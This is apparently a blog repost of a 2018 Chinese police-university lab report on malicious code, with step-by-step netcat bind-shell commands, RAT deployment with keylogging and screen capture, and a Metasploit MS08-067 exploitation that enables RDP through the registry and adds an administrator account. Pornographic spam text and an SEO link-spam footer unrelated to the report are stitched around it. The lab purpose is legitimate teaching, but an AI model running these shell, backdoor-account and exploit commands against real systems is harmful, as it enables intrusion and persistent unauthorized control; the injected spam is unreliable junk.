<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      富利卡

      實驗四

      中國人民公安大學

      Chinese people’ public security university

       

      網(wǎng)絡對抗技術(shù)

      實驗報告

       

      實驗四

      惡意代碼技術(shù)

       

       

       

      學生姓名

      陳雨龍

      年級

      2015 

      區(qū)隊

      三 

      指導教師

       高見

       

       

      信息技術(shù)與網(wǎng)絡安全學院

      20181019

       

      實驗任務總綱

      2018—2019學年  學期

      一、實驗目的

      1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關(guān)知識,加深對木馬的安全防范意識。

       2.了解并熟悉常用的網(wǎng)絡攻擊工具,木馬的基本功能;

      3.達到鞏固課程知識和實際應用的目的。

      二、實驗要求

      1.認真閱讀每個實驗內(nèi)容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。

      2.文檔要求結(jié)構(gòu)清晰,圖文表達準確,標注規(guī)范。推理內(nèi)容客觀、合理、邏輯性強。

      3.軟件工具可使用NC、MSF等。

      4.實驗結(jié)束后,保留電子文檔。

      三、實驗步驟

      1.準備

      提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內(nèi)容,熟悉并準備好實驗用的軟件工具,按照實驗內(nèi)容和要求提前做好實驗內(nèi)容的準備。

      2.實驗環(huán)境

      描述實驗所使用的硬件和軟件環(huán)境(包括各種軟件工具);

      開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。

      3.實驗過程

      1)啟動系統(tǒng)和啟動工具軟件環(huán)境。

      2)用軟件工具實現(xiàn)實驗內(nèi)容。

      4.實驗報告

      按照統(tǒng)一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規(guī)定的書寫格式書寫,表格要有表說圖形要有圖說。

       

      任務一利用NC控制電腦

       

       NetCat,具有網(wǎng)絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現(xiàn)在已經(jīng)壓縮到只有十幾KB,而且在功能上絲毫不減。

       實驗過程需要兩個同學相互配合完成:

       

      步驟一:

       

      在受害者的機器 (同學A)
      輸入下面的命令:
      nc.exe -l -p port -e cmd.exe   進入監(jiān)聽模式

       

       

      步驟二:

       

        在攻擊者的機器.(同學B)
             輸入下面的命令:
        nc ip  port //連接victim_IP,然后得到一個shell。 (需要截圖)

        

       

       

      步驟三:

           在shell中,利用net user 用戶名 密碼 /add ,添加一個用戶,并在受害者的機器中使用 net user 命令進行驗證。(需要截圖)

       

        

       

       可以繼續(xù)通過命令行做一些事情。

       

       

       任務二利用木馬控制電腦

       

      實驗過程需要兩個同學配合:

       步驟一:

      攻擊者的機器. (同學A)

      打開V2014.exe程序或則star RAT,這兩個木馬功能類似。

       

       

        步驟二:

      點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。

       

       

       步驟三:

       將生成的木馬可執(zhí)行程序拷貝到受害者的機器,并雙擊運行。 

       

       步驟四:

       在控制端中查看木馬上線情況,并對以下功能每個進行測試和截圖。 

       

      1. 文件管理,嘗試拷貝文件

       

       

      1. 屏幕控制,嘗試獲取桌面

       

       

      1. 鍵盤記錄,嘗試獲取對方擊鍵記錄

       

       

      1. 會話管理,重啟對方機器,查看是否能自啟動上線(重啟了圖就截不了了,所以沒做)

       會話管理,卸載對方的木馬。

       

       

       任務三通過漏洞獲取shell  所有過程截圖寫博客

       

       windows ms08067 漏洞利用

       一.1 知識背景

       Metasploit是一款開源的安全漏洞檢測工具,Metasploit Framework (MSF) 在2003年以開放源碼方式發(fā)布,是可以自由獲取的開發(fā)框架。它是一個強大的開源平臺,供開發(fā),測試和使用惡意代碼,這個環(huán)境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠平臺。這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平臺上常見的溢出漏洞和流行的 shellcode ,并且不斷更新。 Metasploit Framework并不止具有exploit(溢出)收集功能,它使你專注于創(chuàng)建自己的溢出模塊或者二次開發(fā)。很少的一部分用匯編和C語言實現(xiàn),其余均由ruby實現(xiàn)。總體架構(gòu):

       

       

       一.2 實訓環(huán)境

       Windows XP SP3

       IP:192.168.1.129

       Kali Linux 

       IP:172.16.211.128

       一.3 實訓原理

       漏洞名稱:Windows Server服務RPC請求緩沖區(qū)溢出漏洞(MS08-067)此安全更新解決了服務器服務中一個秘密報告的漏洞。如果用戶在受影響的系統(tǒng)上收到特制的 RPC 請求,則該漏洞可能允許遠程執(zhí)行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統(tǒng)上,攻擊者可能未經(jīng)身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用于進行蠕蟲攻擊。 防火墻最佳做法和標準的默認防火墻配置有助于保護網(wǎng)絡資源免受從企業(yè)外部發(fā)起的攻擊。

       一.4 漏洞利用過程

       在msfconsole使用search命令搜索MS08067漏洞攻擊程序

        

       

       從結(jié)果中得到

       exploit/windows/smb/ms08_067_netapi

       表示當前msf框架中包含MS08067漏洞的攻擊插件。

       使用use命令調(diào)用MS08067漏洞攻擊程序

       use exploit/windows/smb/ms08_067_netapi

        

       

      進入msf的交互式命令窗口下,使用show options 命令查看需要設置的選項。

        

       

      從圖中可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)使用 set 命令設置 Module Options,此處需要設置目標IP即 set RHOST 192.168.1.129

      使用 set 命令設置后,可再使用show options 命令查看設置情況

         

       

      從中可以看出目標IP已經(jīng)設置好接著設置Exploit target,使用show targets 查看可選項可以看出以下版本的系統(tǒng)均存在此漏洞。因為實例演示的XP系統(tǒng)為WinXP SP3 簡體中文版對應的編號為34

        

       

      使用set target 命令設置目標,此處即為set target 34

        

       

      此時再用show options 可以看到全部設置完成。

       

       

      接著使用exploit 或者 run 進行攻擊。

      執(zhí)行exploit命令后得到一個meterpreter命令行交互窗口。 

       

       

      在meterpreter中輸入run getgui -e 命令,可以打開RDP(遠程桌面)服務,端口號3389。

       

       

      繼續(xù)輸入shell即可進入CMD窗口

        

       

      在cmd命令下也可以通過添加注冊表項的方式開啟對方遠程桌面服務(如果上面已經(jīng)開啟了,這步可以省略)。 

      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

      使用netstat -an命令查看端口是否開放,從圖中可以看到已經(jīng)開放3389端口。

        

       

      接著使用net user命令查看XP系統(tǒng)中的用戶

        

       

       在平臺中獲取shell之后,繼續(xù)在命令行添加賬戶和管理員權(quán)限。

       net user user pass /add  

       

       例如:net user wt wt123 /add

       net localgroup administrators /add  

      例如:net localgroup administrators wt /add  

       

      posted on 2018-10-24 08:25  富利卡  閱讀(118)  評論(0)    收藏  舉報

      主站蜘蛛池模板: 亚洲精品天堂一区二区| 亚洲中文字幕无码专区| 在线看无码的免费网站| 国产精品国产精品偷麻豆| 亚洲人妻一区二区精品| 色婷婷av久久久久久久 | 欧美一区二区三区性视频| 少妇又爽又刺激视频| 色悠悠国产在线视频一线| 免费黄色大全一区二区三区| 日韩欧美在线综合网另类| 国产熟女激情一区二区三区| 精品婷婷色一区二区三区| 韩国精品一区二区三区在线观看| 国产精品第一区亚洲精品| 亚洲成av人片无码迅雷下载| 特级做a爰片毛片免费看无码| 亚洲成人精品一区二区中| 在线天堂最新版资源| 国产人妻大战黑人20p| 影视先锋av资源噜噜| 开心五月激情五月俺亚洲| 保靖县| 实拍女处破www免费看| 日亚韩在线无码一区二区三区| 99国产精品欧美一区二区三区 | 最新午夜男女福利片视频| 狠狠爱俺也去去就色| 加勒比亚洲天堂午夜中文| 无码专区 人妻系列 在线| 亚洲av永久无码精品漫画| 亚洲日产韩国一二三四区| 国产午夜无码视频在线观看| 亚洲精品熟女一区二区| 武装少女在线观看高清完整版免费| 色老头亚洲成人免费影院| 亚洲男人第一无码av网站| 国产又色又爽又黄刺激视频 | 国产伦一区二区三区久久| 国产精品午夜av福利| 日韩高清砖码一二区在线|